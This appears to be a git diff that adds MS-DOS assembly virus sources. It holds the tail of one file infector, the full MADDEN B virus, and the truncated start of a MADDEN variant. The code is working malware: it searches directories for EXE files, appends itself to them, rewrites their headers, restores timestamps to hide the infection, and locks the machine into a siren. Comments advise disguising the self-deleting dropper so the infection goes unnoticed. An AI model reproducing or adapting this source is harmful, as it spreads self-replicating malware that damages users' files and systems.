inside load module + mov cx,relo_items ; Number of reallocation items + jcxz items_ok + push cx + push ax + push dx + xor cx,cx ; Get on reallocation table + mov dx,ofs_reloc + mov ax,4200h + int 21h + pop dx + pop ax +read_items: + push ax + push dx + mov ah,3fh + mov dx,offset(original) + mov cx,20*4 ; Read 20 reallocaci¢n items + int 21h + mov si,dx + mov di,-20*4 + pop dx + pop ax +process_item: pop cx + push bx + mov bx,[si] + cmpsw ; inc si, inc si, inc di, inc di + mov bp,[si] + cmpsw ; inc si, inc si, inc di, inc di + + sub bx,ax + sbb bp,dx + jnz next_item + cmp bx,offset(ov_part) ; Is it part of code? + jnbe next_item + cmp bx,7 ; PkLite's code? + pop bx + jnz bad_item + push bx +next_item: dec cx + pop bx + jcxz items_ok + or di,di ; We need read more items? + push cx + jnz process_item + jz read_items +items_ok: + pop cx ; cx:= header length +exe&com: add ax,cx + adc dx,0 ; dx:ax := cs:ip offset in file + push ax + push dx + mov cx,dx + xchg ax,dx ; = mov dx,ax + mov ax,4200h + int 21h ; get on the entry point + mov ah,3fh + mov cx,offset(ov_part) + mov dx,offset(original) + int 21h ; Read original code + sub ax,cx ; Have enough space? + jc no_inf + cmp pages,'<>' ; Id mark is in offset 4 + stc + je no_inf + mov ax,4202h ; Go to he end of file + xor cx,cx + cwd + int 21h + mov long_high,dx ; Save file-offset of code + mov long_low,ax + mov ah,40h ; 'Stick' to the file + mov cx,offset(end_vir) + mov dx,offset(ov_part) + int 21h +no_inf: pop cx + pop dx + jc alr_inf + mov reloc_pkl,0 + mov ax,4200h + int 21h ; Return to cs:ip + mov ah,40h + mov cx,offset(ov_part) + cwd + int 21h ; Write new code on entry-point + push cx +bad_item: pop cx +alr_inf: jmp rest_hour + +end_vir: + +original: +header: +signature dw 20cdh +image_size dw ? +pages dw ? +relo_items dw ? +header_size dw ? +mim_mem dw ? +max_mem dw ? +stack_seg dw ? +stack_ofs dw ? +checksum dw ? +val_ip dw ? +val_cs dw ? +ofs_reloc dw ? +overlays dw ? + +code ends + end start + diff --git a/MSDOS/Virus.MSDOS.Unknown.intr1440.asm b/MSDOS/Virus.MSDOS.Unknown.intr1440.asm new file mode 100644 index 00000000..149c7d8b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.intr1440.asm @@ -0,0 +1,771 @@ +;The MADDEN B virus is an EXE file infector which can jump from directory to +;directory and disk to disk. It attaches itself to the end of a file and +;modifies the EXE file header so that it gets control first, before the host +;program. When it is done doing its job, it passes control to the host program, +;so that the host executes without a hint that the virus is there. + + + .SEQ ;segments must appear in sequential order + ;to simulate conditions in actual active virus + + +;MGROUP GROUP HOSTSEG,HSTACK ;Host stack and code segments grouped together + +;HOSTSEG program code segment. The virus gains control before this routine and +;attaches itself to another EXE file. As such, the host program for this +;installer simply tries to delete itself off of disk and terminates. That is +;worthwhile if you want to infect a system with the virus without getting +;caught. Just execute the program that infects, and it disappears without a +;trace. You might want to name the program something more innocuous, though. +;MADDEN B also locks the pc into a 'siren' warble when it runs out +;of files to infect. MADDEN, included in this archive plays a fast country +;song. (MADDEN will assemble to an .file using a86, then link to produce +;infected .exe form) + +HOSTSEG SEGMENT BYTE + ASSUME CS:HOSTSEG,SS:HSTACK + +PGMSTR DB 'MADDENB.EXE',0 + +HOST: + mov ax,cs ;we want DS=CS here + mov ds,ax + mov dx,OFFSET PGMSTR + mov ah,41H + int 21H ;delete this exe file + mov ah,4CH + mov al,0 + int 21H ;terminate normally +HOSTSEG ENDS + + +;Host program stack segment + +HSTACK SEGMENT PARA STACK + db 100H dup (?) ;100 bytes long +HSTACK ENDS + +;------------------------------------------------------------------------ +;This is the virus itself + +STACKSIZE EQU 100H ;size of stack for the virus +NUMRELS EQU 2 ;number of relocatables in the virus, which must go in the relocatable pointer table + +;VGROUP GROUP VSEG,VSTACK ;Virus code and stack segments grouped together + +;MADDEN Virus code segment. This gains control first, before the host. As this +;ASM file is layed out, this program will look exactly like a simple program +;that was infected by the virus. + +VSEG SEGMENT PARA + ASSUME CS:VSEG,DS:VSEG,SS:VSTACK + +;data storage area comes before any code +VIRUSID DW 0C8AAH ;identifies virus +OLDDTA DD 0 ;old DTA segment and offset +DTA1 DB 2BH dup (?) ;new disk transfer area +DTA2 DB 56H dup (?) ;dta for directory finds (2 deep) +EXE_HDR DB 1CH dup (?) ;buffer for EXE file header +EXEFILE DB '\*.EXE',0 ;search string for an exe file +ALLFILE DB '\*.*',0 ;search string for any file +USEFILE DB 78 dup (?) ;area to put valid file path +LEVEL DB 0 ;depth to search directories for a file +HANDLE DW 0 ;file handle +FATTR DB 0 ;old file attribute storage area +FTIME DW 0 ;old file time stamp storage area +FDATE DW 0 ;old file date stamp storage area +FSIZE DD 0 ;file size storage area +VIDC DW 0 ;storage area to put VIRUSID from new host .EXE in, to check if virus already there +VCODE DB 1 ;identifies this version +COUNT1 DW 8 ;delay counts used by 'siren' routine +COUNT2 DW 3 +COUNT3 DW 20 +COUNT4 DW 10 +;-------------------------------------------------------------------------- +;MADDEN B virus main routine starts here +VIRUS: + push ax ;save startup info in ax + mov ax,cs + mov ds,ax ;set up DS=CS for the virus + mov ax,es ;get PSP Seg + mov WORD PTR [OLDDTA+2],ax ;set up default DTA Seg=PSP Seg in case of abort without getting it + call SHOULDRUN ;run only when certain conditions met signalled by z set + jnz REL1 ;conditions aren't met, go execute host program + call SETSR ;modify SHOULDRUN procedure to activate conditions + call NEW_DTA ;set up a new DTA location + call FIND_FILE ;get an exe file to attack + jnz SIREN ;returned nz - no valid files left, siren time! + call SAVE_ATTRIBUTE ;save the file attributes and leave file opened in r/w mode + call INFECT ;move program code to file we found to attack + call REST_ATTRIBUTE ;restore the original file attributes and close the file +FINISH: call RESTORE_DTA ;restore the DTA to its original value at startup + pop ax ;restore startup value of ax +REL1: ;relocatable marker for host stack segment + mov bx,HSTACK ;set up host program stack segment (ax=segment) + cli ;interrupts off while changing stack + mov ss,bx +REL1A: ;marker for host stack pointer + mov sp,OFFSET HSTACK + mov es,WORD PTR [OLDDTA+2] ;set up ES correctly + mov ds,WORD PTR [OLDDTA+2] ;and DS + sti ;interrupts back on +REL2: ;relocatable marker for host code segment + jmp FAR PTR HOST ;begin execution of host program + +;-------------------------------------------------------------------------- +;First Level - Find a file which passes FILE_OK +; +;This routine does a complex directory search to find an EXE file in the +;current directory, one of its subdirectories, or the root directory or one +;of its subdirectories, to find a file for which FILE_OK returns with C reset. +;If you want to change the depth of the search, make sure to allocate enough +;room at DTA2. This variable needs to have 2BH * LEVEL bytes in it to work, +;since the recursive FINDBR uses a different DTA area for the search (see DOS +;functions 4EH and 4FH) on each level. +; +FIND_FILE: + mov al,'\' ;set up current directory path in USEFILE + mov BYTE PTR [USEFILE],al + mov si,OFFSET USEFILE+1 + xor dl,dl + mov ah,47H + int 21H ;get current dir, USEFILE= \dir + cmp BYTE PTR [USEFILE+1],0 ;see if it is null. If so, its the root + jnz FF2 ;not the root + xor al,al ;make correction for root directory, + mov BYTE PTR [USEFILE],al ;by setting USEFILE = '' +FF2: mov al,2 + mov [LEVEL],al ;search 2 subdirs deep + call FINDBR ;attempt to locate a valid file + jz FF3 ;found one - exit + xor al,al ;nope - try the root directory + mov BYTE PTR [USEFILE],al ;by setting USEFILE= '' + inc al ;al=1 + mov [LEVEL],al ;search one subdir deep + call FINDBR ;attempt to find file +FF3: + ret ;exit with z flag set by FINDBR to indicate success/failure + +;*************************************************************************** +;This routine enables MADDEN B virus to sound a siren +;when it can't find a file to infect +;************************************************************************** +SIREN: + cli ;no interrupts + mov bp,15 ;we want to do hole thing 15 times + mov al,10110110xb ;set up channel 2 + out 43h,al ;send it to port +AGIN: mov bx,500 ;start frequency high +BACKERX:mov ax,bx ;place it in (ax) + out 42h,al ;send LSB first + mov al,ah ;move MSB into al + out 42h,al ;send it next + in al,61h ;get value from port + or al,00000011xb ;ORing it will turn on speaker + out 61h,al ;send number + mov cx,COUNT1 ;number of delay loops +LOOPERX:loop LOOPERX ;so we can hear sound + inc bx ;increment (bx) lowers frequency pitch + cmp bx,4000 ;have we reached 4000 + jnz BACKERX ;if not do again +BACKERY:mov ax,bx ;if not put (bx) in (ax) + out 42h,al ;send LSB to port + mov al,ah ;place MSB in al + out 42h,al ;send it now + in al,61h ;get value from port + or al,00000011xb ;lets OR it + out 61h,al ;time to turn on speaker + mov cx,COUNT2 ;loop count +LOOPERY:loop LOOPERY ;delay so we can hear sound + dec bx ;decrementing (bx) rises frequency pitch + cmp bx,500 ;have we reach 500 + jnz BACKERY ;if not go back + mov si,COUNT3 ;place longer delay in (si) + mov di,COUNT4 ;place longer delay in (di) + push si ;push it on the stack + push di ;push it on the stack + mov si,COUNT1 ;place first delay in (si) + mov di,COUNT2 ;place second delay in (di) + mov COUNT3,si ;save 1st in COUNT3 for next exchange + mov COUNT4,di ;save 2nd in COUNT4 for next exchange + pop di ;pop longer delay off stack + pop si ;pop longer delay off stack + mov COUNT2,di ;place it in the second + mov COUNT1,si ;place it in the first + dec bp ;decrement repeat count + jnz AGIN ;if not = 0 do hole thing again + in al,61h ;we be done + and al,11111100xb ;this number will turn speaker off + out 61h,al ;send it + sti ;enable interrupts + jmp SIREN + +;-------------------------------------------------------------------------- +;SEARCH FUNCTION +;--------------------------------------------------------------------------- +;Second Level - Find in a branch +; +;This function searches the directory specified in USEFILE for EXE files. +;after searching the specified directory, it searches subdirectories to the +;depth LEVEL. If an EXE file is found for which FILE_OK returns with C reset, this +;routine exits with Z set and leaves the file and path in USEFILE +; +FINDBR: + call FINDEXE ;search current dir for EXE first + jnc FBE3 ;found it - exit + cmp [LEVEL],0 ;no - do we want to go another directory deeper? + jz FBE1 ;no - exit + dec [LEVEL] ;yes - decrement LEVEL and continue + mov di,OFFSET USEFILE ;'\curr_dir' is here + mov si,OFFSET ALLFILE ;'\*.*' is here + call CONCAT ;get '\curr_dir\*.*' in USEFILE + inc di + push di ;store pointer to first * + call FIRSTDIR ;get first subdirectory + jnz FBE ;couldn't find it, so quit +FB1: ;otherwise, check it out + pop di ;strip \*.* off of USEFILE + xor al,al + stosb + mov di,OFFSET USEFILE + mov bx,OFFSET DTA2+1EH + mov al,[LEVEL] + mov dl,2BH ;compute correct DTA location for subdir name + mul dl ;which depends on the depth we're at in the search + add bx,ax ;bx points to directory name + mov si,bx + call CONCAT ;'\curr_dir\sub_dir' put in USEFILE + push di ;save position of first letter in sub_dir name + call FINDBR ;scan the subdirectory and its subdirectories (recursive) + jz FBE2 ;if successful, exit + call NEXTDIR ;get next subdirectory in this directory + jz FB1 ;go check it if search successful +FBE: ;else exit, NZ set, cleaned up + inc [LEVEL] ;increment the level counter before exit + pop di ;strip any path or file spec off of original + xor al,al ;directory path + stosb +FBE1: mov al,1 ;return with NZ set + or al,al + ret + +FBE2: pop di ;successful exit, pull this off the stack +FBE3: xor al,al ;and set Z + ret ;exit + +;-------------------------------------------------------------------------- +;Third Level - Part A - Find an EXE file +; +;This function searches the path in USEFILE for an EXE file which passes +;the test FILE_OK. This routine will return the full path of the EXE file +;in USEFILE, and the c flag reset, if it is successful. Otherwise, it will return +;with the c flag set. It will search a whole directory before giving up. +; +FINDEXE: + mov dx,OFFSET DTA1 ;set new DTA for EXE search + mov ah,1AH + int 21H + mov di,OFFSET USEFILE + mov si,OFFSET EXEFILE + call CONCAT ;set up USEFILE with '\dir\*.EXE' + push di ;save position of '\' before '*.EXE' + mov dx,OFFSET USEFILE + mov cx,3FH ;search first for any file + mov ah,4EH + int 21H +NEXTEXE: + or al,al ;is DOS return OK? + jnz FEC ;no - quit with C set + pop di + inc di + stosb ;truncate '\dir\*.EXE' to '\dir\' + mov di,OFFSET USEFILE + mov si,OFFSET DTA1+1EH + call CONCAT ;setup file name '\dir\filename.exe' + dec di + push di + call FILE_OK ;yes - is this a good file to use? + jnc FENC ;yes - valid file found - exit with c reset + mov ah,4FH + int 21H ;do find next + jmp SHORT NEXTEXE ;and go test it for validity + +FEC: ;no valid file found, return with C set + pop di + mov BYTE PTR [di],0 ;truncate \dir\filename.exe to \dir + stc + ret +FENC: ;valid file found, return with NC + pop di + ret + + +;-------------------------------------------------------------------------- +;Third Level - Part B - Find a subdirectory +; +;This function searches the file path in USEFILE for subdirectories, excluding +;the subdirectory header entries. If one is found, it returns with Z set, and +;if not, it returns with NZ set. +;There are two entry points here, FIRSTDIR, which does the search first, and +;NEXTDIR, which does the search next. +; +FIRSTDIR: + call GET_DTA ;get proper DTA address in dx (calculated from LEVEL) + push dx ;save it + mov ah,1AH ;set DTA + int 21H + mov dx,OFFSET USEFILE + mov cx,10H ;search for a directory + mov ah,4EH ;do search first function + int 21H +NEXTD1: + pop bx ;get pointer to search table (DTA) + or al,al ;successful search? + jnz NEXTD3 ;no, quit with NZ set + test BYTE PTR [bx+15H],10H ;is this a directory? + jz NEXTDIR ;no, find another + cmp BYTE PTR [bx+1EH],'.' ;is it a subdirectory header? + jne NEXTD2 ;no - valid directory, exit, setting Z flag + ;else it was dir header entry, so fall through to next +NEXTDIR: ;second entry point for search next + call GET_DTA ;get proper DTA address again - may not be set up + push dx + mov ah,1AH ;set DTA + int 21H + mov ah,4FH + int 21H ;do find next + jmp SHORT NEXTD1 ;and loop to check the validity of the return + +NEXTD2: + xor al,al ;successful exit, set Z flag +NEXTD3: + ret ;exit routine + +;-------------------------------------------------------------------------- +;Return the DTA address associated to LEVEL in dx. This is simply given by +;OFFSET DTA2 + (LEVEL*2BH). Each level must have a different search record +;in its own DTA, since a search at a lower level occurs in the middle of the +;higher level search, and we don't want the higher level being ruined by +;corrupted data. +; +GET_DTA: + mov dx,OFFSET DTA2 + mov al,2BH + mul [LEVEL] + add dx,ax ;return with dx= proper dta offset + ret + +;-------------------------------------------------------------------------- +;Concatenate two strings: Add the asciiz string at DS:SI to the asciiz +;string at ES:DI. Return ES:DI pointing to the end of the first string in the +;destination (or the first character of the second string, after moved). +; +CONCAT: + mov al,byte ptr es:[di] ;find the end of string 1 + inc di + or al,al + jnz CONCAT + dec di ;di points to the null at the end + push di ;save it to return to the caller +CONCAT2: + cld + lodsb ;move second string to end of first + stosb + or al,al + jnz CONCAT2 + pop di ;and restore di to point to end of string 1 + ret + + +;-------------------------------------------------------------------------- +;Function to determine whether the EXE file specified in USEFILE is useable. +;if so return nc, else return c +;What makes an EXE file useable?: +; a) The signature field in the EXE header must be 'MZ'. (These +; are the first two bytes in the file.) +; b) The Overlay Number field in the EXE header must be zero. +; c) There must be room in the relocatable table for NUMRELS +; more relocatables without enlarging it. +; d) The word VIRUSID must not appear in the 2 bytes just before +; the initial CS:0000 of the test file. If it does, the virus +; is probably already in that file, so we skip it. +; +FILE_OK: + call GET_EXE_HEADER ;read the EXE header in USEFILE into EXE_HDR + jc OK_END ;error in reading the file, so quit + call CHECK_SIG_OVERLAY ;is the overlay number zero? + jc OK_END ;no - exit with c set + call REL_ROOM ;is there room in the relocatable table? + jc OK_END ;no - exit + call IS_ID_THERE ;is id at CS:0000? +OK_END: ret ;return with c flag set properly + +;-------------------------------------------------------------------------- +;Returns c if signature in the EXE header is anything but 'MZ' or the overlay +;number is anything but zero. +CHECK_SIG_OVERLAY: + mov al,'M' ;check the signature first + mov ah,'Z' + cmp ax,WORD PTR [EXE_HDR] + jz CSO_1 ;jump if OK + stc ;else set carry and exit + ret +CSO_1: xor ax,ax + sub ax,WORD PTR [EXE_HDR+26];subtract the overlay number from 0 + ret ;c is set if it's anything but 0 + +;-------------------------------------------------------------------------- +;This function reads the 28 byte EXE file header for the file named in USEFILE. +;It puts the header in EXE_HDR, and returns c set if unsuccessful. +; +GET_EXE_HEADER: + mov dx,OFFSET USEFILE + mov ax,3D02H ;r/w access open file + int 21H + jc RE_RET ;error opening - C set - quit without closing + mov [HANDLE],ax ;else save file handle + mov bx,ax ;handle to bx + mov cx,1CH ;read 28 byte EXE file header + mov dx,OFFSET EXE_HDR ;into this buffer + mov ah,3FH + int 21H +RE_RET: ret ;return with c set properly + +;-------------------------------------------------------------------------- +;This function determines if there are at least NUMRELS openings in the +;current relocatable table in USEFILE. If there are, it returns with +;carry reset, otherwise it returns with carry set. The computation +;this routine does is to compare whether +; ((Header Size * 4) + Number of Relocatables) * 4 - Start of Rel Table +;is >= than 4 * NUMRELS. If it is, then there is enough room +; +REL_ROOM: + mov ax,WORD PTR [EXE_HDR+8] ;size of header, paragraphs + add ax,ax + add ax,ax + sub ax,WORD PTR [EXE_HDR+6] ;number of relocatables + add ax,ax + add ax,ax + sub ax,WORD PTR [EXE_HDR+24] ;start of relocatable table + cmp ax,4*NUMRELS ;enough room to put relocatables in? +RR_RET: ret ;exit with carry set properly + + +;-------------------------------------------------------------------------- +;This function determines whether the word at the initial CS:0000 in USEFILE +;is the same as VIRUSID in this program. If it is, it returns c set, otherwise +;it returns c reset. +; +IS_ID_THERE: + mov ax,WORD PTR [EXE_HDR+22] ;Initial CS + add ax,WORD PTR [EXE_HDR+8] ;Header size + mov dx,16 + mul dx + mov cx,dx + mov dx,ax ;cxdx = position to look for VIRUSID in file + mov bx,[HANDLE] + mov ax,4200H ;set file pointer, relative to beginning + int 21H + mov ah,3FH + mov bx,[HANDLE] + mov dx,OFFSET VIDC + mov cx,2 ;read 2 bytes into VIDC + int 21H + jc II_RET ;couldn't read - bad file - report as though ID is there so we dont do any more to this file + mov ax,[VIDC] + cmp ax,[VIRUSID] ;is it the VIRUSID? + clc + jnz II_RET ;if not, then virus is not already in this file + stc ;else it is probably there already +II_RET: ret + + +;-------------------------------------------------------------------------- +;This routine makes sure file end is at paragraph boundary, so the virus +;can be attached with a valid CS. Assumes file pointer is at end of file. +SETBDY: + mov al,BYTE PTR [FSIZE] + and al,0FH ;see if we have a paragraph boundary (header is always even # of paragraphs) + jz SB_E ;all set - exit + mov cx,10H ;no - write any old bytes to even it up + sub cl,al ;number of bytes to write in cx + mov dx,OFFSET FINAL ;set buffer up to point to end of the code (just garbage there) + add WORD PTR [FSIZE],cx ;update FSIZE + adc WORD PTR [FSIZE+2],0 + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H +SB_E: ret + +;-------------------------------------------------------------------------- +;This routine moves the virus (this program) to the end of the EXE file +;Basically, it just copies everything here to there, and then goes and +;adjusts the EXE file header and two relocatables in the program, so that +;it will work in the new environment. It also makes sure the virus starts +;on a paragraph boundary, and adds how many bytes are necessary to do that. +; +INFECT: + mov cx,WORD PTR [FSIZE+2] + mov dx,WORD PTR [FSIZE] + mov bx,[HANDLE] + mov ax,4200H ;set file pointer, relative to beginning + int 21H ;go to end of file + call SETBDY ;lengthen to a paragraph boundary if necessary + mov cx,OFFSET FINAL ;last byte of code + xor dx,dx ;first byte of code, DS:DX + mov bx,[HANDLE] ;move virus code to end of file being attacked with + mov ah,40H ;DOS write function + int 21H + mov dx,WORD PTR [FSIZE] ;find 1st relocatable in code (SS) + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL1 ;it is at FSIZE+REL1+1 in the file + inc bx + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx is that number + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to 1st relocatable + int 21H + mov dx,OFFSET EXE_HDR+14 ;get correct old SS for new program + mov bx,[HANDLE] ;from the EXE header + mov cx,2 + mov ah,40H ;and write it to relocatable REL1+1 + int 21H + mov dx,WORD PTR [FSIZE] + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL1A ;put in correct old SP from EXE header + inc bx ;at FSIZE+REL1A+1 + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx points to FSIZE+REL1A+1 + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to place to write SP to + int 21H + mov dx,OFFSET EXE_HDR+16 ;get correct old SP for infected program + mov bx,[HANDLE] ;from EXE header + mov cx,2 + mov ah,40H ;and write it where it belongs + int 21H + mov dx,WORD PTR [FSIZE] + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL2 ;put in correct old CS:IP in program + add bx,1 ;at FSIZE+REL2+1 on disk + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx points to FSIZE+REL2+1 + mov bx,[HANDLE] + mov ax,4200H ;set file pointer relavtive to start of file + int 21H + mov dx,OFFSET EXE_HDR+20 ;get correct old CS:IP from EXE header + mov bx,[HANDLE] + mov cx,4 + mov ah,40H ;and write 4 bytes to FSIZE+REL2+1 + int 21H + ;done writing relocatable vectors + ;so now adjust the EXE header values + xor cx,cx + xor dx,dx + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to start of file + int 21H + mov ax,WORD PTR [FSIZE] ;calculate new initial CS (the virus' CS) + mov cl,4 ;given by (FSIZE/16)-HEADER SIZE (in paragraphs) + shr ax,cl + mov bx,WORD PTR [FSIZE+2] + and bl,0FH + mov cl,4 + shl bl,cl + add ah,bl + sub ax,WORD PTR [EXE_HDR+8] ;(exe header size, in paragraphs) + mov WORD PTR [EXE_HDR+22],ax;and save as initial CS + mov bx,OFFSET FINAL ;compute new initial SS + add bx,10H ;using the formula SSi=(CSi + (OFFSET FINAL+16)/16) + mov cl,4 + shr bx,cl + add ax,bx + mov WORD PTR [EXE_HDR+14],ax ;and save it + mov ax,OFFSET VIRUS ;get initial IP + mov WORD PTR [EXE_HDR+20],ax ;and save it + mov ax,STACKSIZE ;get initial SP + mov WORD PTR [EXE_HDR+16],ax ;and save it + mov dx,WORD PTR [FSIZE+2] + mov ax,WORD PTR [FSIZE] ;calculate new file size + mov bx,OFFSET FINAL + add ax,bx + xor bx,bx + adc dx,bx ;put it in ax:dx + add ax,200H ;and set up the new page count + adc dx,bx ;page ct= (ax:dx+512)/512 + push ax + mov cl,9 + shr ax,cl + mov cl,7 + shl dx,cl + add ax,dx + mov WORD PTR [EXE_HDR+4],ax ;and save it here + pop ax + and ax,1FFH ;now calculate last page size + mov WORD PTR [EXE_HDR+2],ax ;and put it here + mov ax,NUMRELS ;adjust relocatables counter + add WORD PTR [EXE_HDR+6],ax + mov cx,1CH ;and save data at start of file + mov dx,OFFSET EXE_HDR + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H + mov ax,WORD PTR [EXE_HDR+6] ;get number of relocatables in table + dec ax ;in order to calculate location of + dec ax ;where to add relocatables + mov bx,4 ;Location= (No in table-2)*4+Table Offset + mul bx + add ax,WORD PTR [EXE_HDR+24];table offset + mov bx,0 + adc dx,bx ;dx:ax=end of old table in file + mov cx,dx + mov dx,ax + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to table end + int 21H + mov ax,WORD PTR [EXE_HDR+22] ;and set up 2 pointers: init CS = seg of REL1 + mov bx,OFFSET REL1 + inc bx ;offset of REL1 + mov WORD PTR [EXE_HDR],bx ;use EXE_HDR as a buffer to + mov WORD PTR [EXE_HDR+2],ax ;save relocatables in for now + mov ax,WORD PTR [EXE_HDR+22] ;init CS = seg of REL2 + mov bx,OFFSET REL2 + add bx,3 ;offset of REL2 + mov WORD PTR [EXE_HDR+4],bx ;write it to buffer + mov WORD PTR [EXE_HDR+6],ax + mov cx,8 ;and then write 8 bytes of data in file + mov dx,OFFSET EXE_HDR + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H + ret ;that's it, infection is complete! + +;-------------------------------------------------------------------------- +;This routine determines whether the reproduction code should be executed. +;If it returns Z, the reproduction code is executed, otherwise it is not. +;Currently, it only executes if the system time variable is a multiple of +;TIMECT. As such, the virus will reproduce only 1 out of every TIMECT+1 +;executions of the program. TIMECT should be 2^n-1 +;Note that the ret at SR1 is replaced by a NOP by SETSR whenever the program +;is run. This makes SHOULDRUN return Z for sure the first time, so it +;definitely runs when this loader program is run, but after that, the time must +;be an even multiple of TIMECT+1. +; +TIMECT EQU 0 ;Determines how often to reproduce (1/64 here) +; +SHOULDRUN: + xor ah,ah ;zero ax to start, set z flag +SR1: ret ;this gets replaced by NOP when program runs + int 1AH + and dl,TIMECT ;is it an even multiple of TIMECT+1 ticks? + ret ;return with z flag set if it is, else nz set + + +;-------------------------------------------------------------------------- +;SETSR modifies SHOULDRUN so that the full procedure gets run +;it is redundant after the initial load +SETSR: + mov al,90H ;NOP code + mov BYTE PTR SR1,al ;put it in place of RET above + ret ;and return + +;-------------------------------------------------------------------------- +;This routine sets up the new DTA location at DTA1, and saves the location of +;the initial DTA in the variable OLDDTA. +NEW_DTA: + mov ah,2FH ;get current DTA in ES:BX + int 21H + mov WORD PTR [OLDDTA],bx ;save it here + mov ax,es + mov WORD PTR [OLDDTA+2],ax + mov ax,cs + mov es,ax ;set up ES + mov dx,OFFSET DTA1 ;set new DTA offset + mov ah,1AH + int 21H ;and tell DOS where we want it + ret + +;-------------------------------------------------------------------------- +;This routine reverses the action of NEW_DTA and restores the DTA to its +;original value. +RESTORE_DTA: + mov dx,WORD PTR [OLDDTA] ;get original DTA seg:ofs + mov ax,WORD PTR [OLDDTA+2] + mov ds,ax + mov ah,1AH + int 21H ;and tell DOS where to put it + mov ax,cs ;restore ds before exiting + mov ds,ax + ret + +;-------------------------------------------------------------------------- +;This routine saves the original file attribute in FATTR, the file date and +;time in FDATE and FTIME, and the file size in FSIZE. It also sets the +;file attribute to read/write, and leaves the file opened in read/write +;mode (since it has to open the file to get the date and size), with the handle +;it was opened under in HANDLE. The file path and name is in USEFILE. +SAVE_ATTRIBUTE: + mov ah,43H ;get file attr + mov al,0 + mov dx,OFFSET USEFILE + int 21H + mov [FATTR],cl ;save it here + mov ah,43H ;now set file attr to r/w + mov al,1 + mov dx,OFFSET USEFILE + mov cl,0 + int 21H + mov dx,OFFSET USEFILE + mov al,2 ;now that we know it's r/w + mov ah,3DH ;we can r/w access open file + int 21H + mov [HANDLE],ax ;save file handle here + mov ah,57H ;and get the file date and time + xor al,al + mov bx,[HANDLE] + int 21H + mov [FTIME],cx ;and save it here + mov [FDATE],dx ;and here + mov ax,WORD PTR [DTA1+28] ;file size was set up here by + mov WORD PTR [FSIZE+2],ax ;search routine + mov ax,WORD PTR [DTA1+26] ;so move it to FSIZE + mov WORD PTR [FSIZE],ax + ret + +;-------------------------------------------------------------------------- +;Restore file attribute, and date and time of the file as they were before +;it was infected. This also closes the file +REST_ATTRIBUTE: + mov dx,[FDATE] ;get old date and time + mov cx,[FTIME] + mov ah,57H ;set file date and time to old value + mov al,1 + mov bx,[HANDLE] + int 21H + mov ah,3EH + mov bx,[HANDLE] ;close file + int 21H + mov cl,[FATTR] + xor ch,ch + mov ah,43H ;Set file attr to old value + mov al,1 + mov dx,OFFSET USEFILE + int 21H + ret + +FINAL: ;last byte of code to be kept in virus + +VSEG ENDS + + +;-------------------------------------------------------------------------- +;Virus stack segment + +VSTACK SEGMENT PARA STACK + db STACKSIZE dup (?) +VSTACK ENDS + + END VIRUS ;Entry point is the virus diff --git a/MSDOS/Virus.MSDOS.Unknown.intr1988.asm b/MSDOS/Virus.MSDOS.Unknown.intr1988.asm new file mode 100644 index 00000000..8036909d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.intr1988.asm @@ -0,0 +1,805 @@ +;The MADDEN virus is an EXE file infector which can jump from directory to +;directory. It attaches itself to the end of a file and +;modifies the EXE file header so that it gets control first, before the host +;program. When it is done doing its job, it passes control to the host program, +;so that the host executes without a hint that the virus is there. + + + .SEQ ;segments must appear in sequential order + ;to simulate conditions in actual active virus + + +;MGROUP GROUP HOSTSEG,HSTACK ;Host stack and code segments grouped together + +;HOSTSEG program code segment. The virus gains control before this routine and +;attaches itself to another EXE file. As such, the host program for this +;installer simply tries to delete itself off of disk and terminates. That is +;worthwhile if you want to infect a system with the virus without getting +;caught. Just execute the program that infects, and it disappears without a +;trace. You might want to name the program something more innocuous, though. +;MADDEN also locks the pc into a 'maddening' toon when it runs out +;of files to infect. (MADDEN can be assembled to an .obj file under a86, +;then linked to the 'infected' .exe form.) + +HOSTSEG SEGMENT BYTE + ASSUME CS:HOSTSEG,SS:HSTACK + +PGMSTR DB 'MADDEN.EXE',0 + +HOST: + mov ax,cs ;we want DS=CS here + mov ds,ax + mov dx,OFFSET PGMSTR + mov ah,41H + int 21H ;delete this exe file + mov ah,4CH + mov al,0 + int 21H ;terminate normally +HOSTSEG ENDS + + +;Host program stack segment + +HSTACK SEGMENT PARA STACK + db 100H dup (?) ;100 bytes long +HSTACK ENDS + +;------------------------------------------------------------------------ +;This is the virus itself + +STACKSIZE EQU 100H ;size of stack for the virus +NUMRELS EQU 2 ;number of relocatables in the virus, which must go in the relocatable pointer table + +;VGROUP GROUP VSEG,VSTACK ;Virus code and stack segments grouped together + +;MADDEN Virus code segment. This gains control first, before the host. As this +;ASM file is layed out, this program will look exactly like a simple program +;that was infected by the virus. + +VSEG SEGMENT PARA + ASSUME CS:VSEG,DS:VSEG,SS:VSTACK + +;data storage area comes before any code +VIRUSID DW 0C8AAH ;identifies virus +OLDDTA DD 0 ;old DTA segment and offset +DTA1 DB 2BH dup (?) ;new disk transfer area +DTA2 DB 56H dup (?) ;dta for directory finds (2 deep) +EXE_HDR DB 1CH dup (?) ;buffer for EXE file header +EXEFILE DB '\*.EXE',0 ;search string for an exe file +ALLFILE DB '\*.*',0 ;search string for any file +USEFILE DB 78 dup (?) ;area to put valid file path +LEVEL DB 0 ;depth to search directories for a file +HANDLE DW 0 ;file handle +FATTR DB 0 ;old file attribute storage area +FTIME DW 0 ;old file time stamp storage area +FDATE DW 0 ;old file date stamp storage area +FSIZE DD 0 ;file size storage area +VIDC DW 0 ;storage area to put VIRUSID from new host .EXE in, to check if virus already there +VCODE DB 1 ;identifies this version +MUZIK dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, ;MUZIK - notes/delay + dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, ;in format xxxx,yyyy + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 